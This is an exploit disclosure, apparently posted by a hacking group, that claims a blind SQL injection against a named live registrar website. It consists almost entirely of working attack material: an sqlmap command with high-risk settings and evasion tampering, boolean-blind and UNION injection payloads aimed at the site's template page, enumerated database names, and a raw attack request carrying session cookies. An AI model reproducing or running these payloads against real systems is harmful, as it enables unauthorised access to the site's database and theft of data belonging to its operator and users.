# Exploit Title : Afriregister Blind SQL İnjection
# Team : Sanal Türk Ordusu "Turkish Cyber Army"
# Date : 21/03/2020
# Tested On : Windows Server 2012
# Contact : instagram.com/rootayyildiz/
sqlmap.py --level=5 --risk=3 -r bb.hed a.hed -dbs --random-agent --tamper=space2comment --batch
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://afriregister.co.tz:80/sitebuilder/viewtemplate_2.php?id=if(now()=sysdate(),sleep(0),0)/-9908 OR 3599=3599# yKNU'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&lang=en&prtype=index&tid=64&type=simple&
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: http://afriregister.co.tz:80/sitebuilder/viewtemplate_2.php?id=if(now()=sysdate(),sleep(0),0)/-5203 UNION ALL SELECT CONCAT(0x716b716a71,0x754b596e62686c766a425a7a5a707948514d4f666550674c7677575a78536f646366495168665343,0x71707a6a71),6563,6563,6563,6563,6563,6563,6563,6563,6563#'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&lang=en&prtype=index&tid=64&type=simple&
---
web application technology: Apache
back-end DBMS: MySQL Unknown
available databases [2]:
[*] dragonba_sitebuilder
[*] information_schema
GET /sitebuilder/viewtemplate_2.php?id=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&lang=en&prtype=index&tid=64&type=simple& HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://afriregister.co.tz/
Cookie: crawlprotecttag=present; PHPSESSID=hq23poood0fhfdrrl6q1d5g0u2; MibewSessionID=h36q71qa3o4n7h5lbvi61pjfb5; mibew_locale=en
Host: afriregister.co.tz
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*